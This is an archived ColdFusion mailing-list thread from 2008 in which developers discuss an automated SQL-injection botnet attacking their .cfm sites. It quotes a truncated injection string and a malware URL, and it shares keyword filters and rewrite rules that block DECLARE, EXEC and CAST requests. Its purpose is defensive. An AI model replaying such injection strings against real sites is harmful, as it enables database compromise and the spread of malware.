The attacks are ONLY against our .CFM pages. No attacks are being run against
our obfuscated CFM pages (product.cfm?id=12 => /product/12.html ).
Here's the botnet attack that appears to be hitting us all:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
Decoding the hex of our current attacks and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js (malware).
That is the Asprox botnet, which has beem going through ASP sites for a while...
looks like they recruited a bunch of drones, and those drones have moved from ASP
(verynx attacks) to attack CF. Pretty ingenious really, infecting websites via
injection attack in order to infect clients with browser vulnerabilities.
The more CF sites that get infected, the more drones that are recruited, and the
more persistent the attacks become.
Here's the rewrite I'm using (linux apache) to keep traffic off the app server.
RewriteCond %{QUERY_STRING} .*DECLARE.*
RewriteRule ^(.*)$ violation.htm [nc,L]
Interesting philosophical thought:
I can't help but believe that the URL rewriting we do over much of our site
(product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the
attacks significantly. It seems to me that such URL rewriting is actually a
very important security tool as we enter a period where botnets start targetting
.cfm pages.
I plan on increasing our CFM obfuscation over the coming weeks to help hide CF
from the search engines and automated attacks. Seems to me that it's a lot
safer presenting your entire site as HTML to the outside world.
Regards
Terry
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310559
They might be doing a screen scrape looking for an error message to see if
they've hit on a vulnerable parameter. When/if the find one, they probably
log it or attempt to attack it.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Eric P
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310558
We've also noticed these SQL injection attempts rear their head the
last day or so; saw almost the exact same type of attack (I.e., same
injection payload) back in April as well.
The attack we're seeing is very (MS) SQL Server specific as they're
trying to hit some SQL Server system tables and inject some HTML links
in any fields that can hold text. We put in place a simple filter at
the tops of our pages to cfabort any requests that contain T-SQL cruft
in the URL/FORM vars (I.e., DECLARE, EXEC(, CAST(, etc.).
We're also noticing some URL var snooping going on that may or may not
be related to the above attacks. Basically an apostrophe is being
tried at the end of known URL vars combinations.
For example, we'll see three successive errant query strings come
through like this.
?a=1'&b=2&c=3
?a=1&b=2'&c=3
?a=1&b=2&c=3'
where they're trying the apostrophe at the end of each var trying to
escape a potential var being use as an SQL string in the back end.
IP address bounces around too much, so it's tough to monitor/ban.
Something like fail2ban (www.fail2ban.org) may be useful for those
running Unix/Linux servers.
Eric Pierce
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310556
Hysterical!!
Ben Forta said ....>
<<<<> On the plus side, it's nice to see CF finally getting the
recognition
it
> deserves, even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
> repugnant socially-inept basement-dwelling death-penalty-deserving
hacker-wannabes.
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
WIndsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310555
Hysterical!!
Ben Forta said ....>
<<<<> On the plus side, it's nice to see CF finally getting the
recognition
it
> deserves, even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
> repugnant socially-inept basement-dwelling death-penalty-deserving
hacker-wannabes.
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
WIndsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Dave Long
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310554
I've heard that in Saudi Arabia, a thief has the offending member removed at
the wrist. Since hackers commit their offence with their brain, wouldn't it
be appropriate to behead them?
Just a suggestion. :-\
Dave L.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310553
> > ... by despicable scum-sucking feeble-excuse-for-a-
> > carbon-based-life-form repugnant socially-inept
> > basement-dwelling death-penalty-deserving hacker-wannabes.
>
> What makes you think they're lawyers, Ben?
That really isn't called for, Mike. You should be ashamed of yourself.
Lawyers are NOT generally hacker-wannabes, and most don't live in basements.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310551
Mike,
That's the funniest comment I've heard this week... 10 points for Mr.Kear.
-mark
Ben Forta said ....>
<<<<> On the plus side, it's nice to see CF finally getting the
recognition
it
> deserves, even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
> repugnant socially-inept basement-dwelling death-penalty-deserving
hacker-wannabes.
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
WIndsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310550
> even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes
Come on, Ben! Don't hold back! Tell us how you *really* feel! :o)
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310549
Ben Forta said ....>
<<<<> On the plus side, it's nice to see CF finally getting the
recognition it
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
WIndsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310548
Well, at its most basic level, the process of "accepting a cookie" is really
nothing more than parsing the response headers you get back from the web
server looking for set-cookie: headers, and then returning the same
name/value pairs in a cookie: header the next time you send a request to the
server. Sure, there are rules around how it is supposed to work, but it
isn't hard to implement.
I can see how it would be advantageous to a bot if more and more sites these
days required cookies in order to browse to all the pages.
~Brad
> very few bots accept cookies. I've never actually seen one that does,
> but I have read it is possible to write one that will.
>
>
> Wil Genovese
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310547
> I've love to get my hands on an infected machine, but that
> would be about impossible without ISPs giving a darn.
It's quite easy to get your hands on an infected machine. Take a machine and
let it get infected. Enjoy! VMware VMs are great for this.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310546
That makes a bit of sense. One difference would probably be if the
attackers were interested in the web server's response. If not, they could
just fire and forget the request and ignore anything that came back--
including set-cookie headers. I'm just curious why some of the hits return
the cookie after multiple successive hits, but others don't. It may have to
do with the order the hits are sent out. The bot could spider one page, and
then send out 15 asynch attack attempts to all the links on that page before
moving on.
I've love to get my hands on an infected machine, but that would be about
impossible without ISPs giving a darn.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310545
Brad,
That might make sense if the infection is some sort of control that makes
use of an underlying request architecture (IE's for example). If that were
the case then the request would be exactly as if it came from the users
browser... Cookies and all - yes?
-mark
> Dang, the brutes thought of everything. I even tried a test to see if
> the bots would return cookies I attempted to set in order to track
> them easier.
> Nope, they don't.
Ok, I take that back. SOME, but not all, of the hack attempts come back to
my site with the cookie I sent to them previously. Rather interesting-- I
would expect them to all behave the same way. Perhaps there are different
versions of the Trojan out there.
Also, the attacks on my server today seem to either be targeting certain SES
URLs, or just plain broken. I am getting hits like:
/index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS
CHAR(4000));EXEC(@S);
You can see that the malicious string is NOT being sent in as any particular
URL parameter. Furthermore, since the = sign has not been escaped, the
string gets broken up such that the variable name is ";DECLARE @S
CHAR(4000);SET @S" and the value is the rest of the string. What the heck
are they trying to do? Has today's attacks actually infected anyone?
~Brad
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310544
>>very few bots accept cookies. I've never actually seen one that does,
but I have read it is possible to write one that will.
... If you use CF to write the bot, for instance ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310542
> Dang, the brutes thought of everything. I even tried a test to see if the
> bots would return cookies I attempted to set in order to track them
> easier.
> Nope, they don't.
Ok, I take that back. SOME, but not all, of the hack attempts come back to
my site with the cookie I sent to them previously. Rather interesting-- I
would expect them to all behave the same way. Perhaps there are different
versions of the Trojan out there.
Also, the attacks on my server today seem to either be targeting certain SES
URLs, or just plain broken. I am getting hits like:
/index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS
CHAR(4000));EXEC(@S);
You can see that the malicious string is NOT being sent in as any particular
URL parameter. Furthermore, since the = sign has not been escaped, the
string gets broken up such that the variable name is ";DECLARE @S
CHAR(4000);SET @S" and the value is the rest of the string. What the heck
are they trying to do? Has today's attacks actually infected anyone?
~Brad
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310541
Darn, I blew my cover! ;-)
--- Ben
Ben Forta wrote:
> ... parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
repugnant
> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
>
> --- Ben
Now please don't hold back your feelings on our account. Please just
tell us how you really feel!
P.S. As Mark said. This is a cool side of a CF celebrity we just don't
get to see. Cool!
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310539
very few bots accept cookies. I've never actually seen one that does,
but I have read it is possible to write one that will.
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310540
Ben Forta wrote:
> ... parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
>
> --- Ben
Now please don't hold back your feelings on our account. Please just
tell us how you really feel!
P.S. As Mark said. This is a cool side of a CF celebrity we just don't
get to see. Cool!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310537
Dang, the brutes thought of everything. I even tried a test to see if the
bots would return cookies I attempted to set in order to track them easier.
Nope, they don't.
~Brad
Author: Alan Rother
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310536
I think alot of us are doing that now.
Do you think it would be helpful in some way for us to all pool that data?
Create some central repository for it so we can all make use of it and maybe
even get the attention of some of the ISP?
----- Excess quoted text cut - see Original Post for more -----
--
Alan Rother
Adobe Certified Advanced ColdFusion MX 7 Developer
Manager, Phoenix Cold Fusion User Group, AZCFUG.org
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310535
Yep, was curious about that too. I modified Justin's script to not send
e-mails, but to write a simple log entry - more an act of curiosity than
anything else - I just log the date, time, and client IP address.
--- Ben
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310533
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310532
Ben,
I know I speak for all of us when I say this is a side of you we've never
seen. The jury's out but I think I like it (ha).
-Mark
Yep, I turned e-mail notifications off too, leave it on and you can
inadvertently turn blocking SQL injection attacks into a self-imposed DoS
attack. Fun stuff.
On the plus side, it's nice to see CF finally getting the recognition it
deserves, even if it is from parasitic bottom-feeding bots created by
despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
--- Ben
Which explains why House of Fusion is being so heavily hit. We're literally
everywhere on Google. Fusion Authority on the other hand has all of its urls
masked to .htm so the only one being attacked there is an old .cfm archive.
I'm working on a webserver level fix for this which will bypass the need to
block based on IPs. I just need a few moments. The attacks are hitting VERY
hard. I got 4000 alert emails in the space of 5 minutes before I turned them
off again.
On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com
----- Excess quoted text cut - see Original Post for more -----
search
----- Excess quoted text cut - see Original Post for more -----
and
> Wales under registered number OC307980 whose registered office address
> is
at
> Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB.
> A list of members is available for inspection at the registered
> office. Any reference to a partner in relation to Halliwells LLP means
> a member of Halliwells LLP. Regulated by The Solicitors Regulation
Authority.
>
> CONFIDENTIALITY
>
> This email is intended only for the use of the addressee named above
> and may be confidential or legally privileged. If you are not the
> addressee
you
> must not read it and must not use any information contained in nor
> copy it nor inform any person other than Halliwells LLP or the
> addressee of its existence or contents. If you have received this
> email in error please delete it and notify Halliwells LLP IT Department on
0870 365 2500.
>
> For more information about Halliwells LLP visit www.halliwells.com.
>
>
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310530
Preach it Brother Ben!
----- Excess quoted text cut - see Original Post for more -----
Author: Alan Rother
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310531
Geez Ben, tell how you really feel...
=]
----- Excess quoted text cut - see Original Post for more -----
--
Alan Rother
Adobe Certified Advanced ColdFusion MX 7 Developer
Manager, Phoenix Cold Fusion User Group, AZCFUG.org
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310529
Yep, I turned e-mail notifications off too, leave it on and you can
inadvertently turn blocking SQL injection attacks into a self-imposed DoS
attack. Fun stuff.
On the plus side, it's nice to see CF finally getting the recognition it
deserves, even if it is from parasitic bottom-feeding bots created by
despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
--- Ben
Which explains why House of Fusion is being so heavily hit. We're literally
everywhere on Google. Fusion Authority on the other hand has all of its urls
masked to .htm so the only one being attacked there is an old .cfm archive.
I'm working on a webserver level fix for this which will bypass the need to
block based on IPs. I just need a few moments. The attacks are hitting VERY
hard. I got 4000 alert emails in the space of 5 minutes before I turned them
off again.
On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com
----- Excess quoted text cut - see Original Post for more -----
search
----- Excess quoted text cut - see Original Post for more -----
and
> Wales under registered number OC307980 whose registered office address is
at
----- Excess quoted text cut - see Original Post for more -----
you
----- Excess quoted text cut - see Original Post for more -----
Author: Scott Stewart
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310527
Ouch....
Thanks Tom... :)
--
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: sastew01@email.unc.edu
Tom Chiverton wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310528
Which explains why House of Fusion is being so heavily hit. We're literally
everywhere on Google. Fusion Authority on the other hand has all of its urls
masked to .htm so the only one being attacked there is an old .cfm archive.
I'm working on a webserver level fix for this which will bypass the need to
block based on IPs. I just need a few moments. The attacks are hitting VERY
hard. I got 4000 alert emails in the space of 5 minutes before I turned them
off again.
On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310524
> I'm almost flattered that someone thought my site was important enough
> to attack...
They didn't. The attack is probably driving itself based on a Google search (
[inurl:.cfm] ?) .
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Scott Stewart
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310515
and your absolutely right, I've gotten two and query params covered it,
but it sounds like you're getting hit two pronged.
"If the injection doesn't do something, the brute force attack will"
I'm almost flattered that someone thought my site was important enough
to attack...
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: sastew01@email.unc.edu
Michael Dinowitz wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310514
In the last 7 hours since i set up a counter on it, i've had 2792 on
sites far lower volume than HouseofFusion.. So do i get a prize?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
> Yeah, I've gotten a couple today.. but fortunately when Ray built
> BlogCFC. he covered his bases.
>
> Scott Stewart
> ColdFusion Developer
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310512
Covering the bases with cfqueryparam is one thing, being mobbed is another.
Sometimes you have to stop these things before any other code is run. I've
put that abort script at the top of all my application.cfcs jst to brute
force stop the horde.
On Fri, Aug 8, 2008 at 10:31 AM, Scott Stewart
<sastew01@email.unc.edu>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Scott Stewart
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310511
Yeah, I've gotten a couple today.. but fortunately when Ray built
BlogCFC. he covered his bases.
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: sastew01@email.unc.edu
Michael Dinowitz wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310505
Sorry for the problems with the House of Fusion site. We've been under
massive attack by sql injection bots and I've just been able to get a handle
on it. A fast solution to the problem is this:
<cfif findnocase("';DECLARE",
cgi.query_string)><cfabort></cfif>
It works unless you have a few hundred attacks at a time. In that case,
place a cfmail before the abort and send youself the cgi.remote_addr. Then
block it on the webserver level. It works very well. I've blocked a dozen
IPs and now the site is back to flying.
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
|
May 24, 2012
|
Latest Fusion Authority Articles
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
